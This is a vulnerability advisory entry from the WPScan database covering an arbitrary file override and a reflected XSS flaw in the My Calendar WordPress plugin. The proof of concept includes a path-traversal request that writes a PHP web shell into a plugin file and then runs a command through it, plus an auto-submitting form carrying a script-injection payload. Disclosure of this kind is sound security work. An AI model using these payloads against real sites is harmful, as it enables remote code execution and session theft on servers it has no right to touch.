My Calendar <= 2.3.29 - Arbitrary File Override & Reflected XSS



Description
The file override vulnerability allows an admin to override any file on the web server, ignoring settings such as DISALLOW_FILE_EDIT.
Proof of Concept
Arbitrary File Override
-----------------------

POST http://localhost/wordpress/wp-admin/admin.php?page=my-calendar-styles
   Post Data:
      _wpnonce[a_valid_nonce]
      mc_edit_style[true]

mc_css_file[../../../../../../../var/www/wordpress/wp-content/plugins/some-plugin/some-writable-file.php]
      mc_show_css[]
      style[<?php passthru($_GET['exec']) ?>]
      save[Save+Changes]

GET
http://localhost/wordpress/wp-content/plugins/some-plugin/some-writable-file.php?exec=id

Reflected XSS
-------------

<form name="myform"
action="http://localhost/wordpress/wp-admin/admin.php?page=my-calendar-help"
method="POST">
<input name="generator" id="generator" value="1">
<input name="foo" id="foo" value="</textarea><script>alert(1)</script>">
<input type="submit" value="Submit">
</form>
<script>document.myform.submit();</script>

Affects Plugin

fixed in version 2.3.30

References

URL http://software-talk.org/blog/2015/05/arbitrary-file-override-reflected-xss-my-calendar-wordpress-plugin/

Classification

Type MULTI

Miscellaneous

Submitter Tim Coen
Submitter Website http://software-talk.org/blog
Views 235
Verified No
WPVDB ID 7990

Timeline

Publicly Published 2015-05-15 (over 3 years ago)
Added 2015-05-15 (over 3 years ago)
Last Updated 2015-05-15 (over 3 years ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.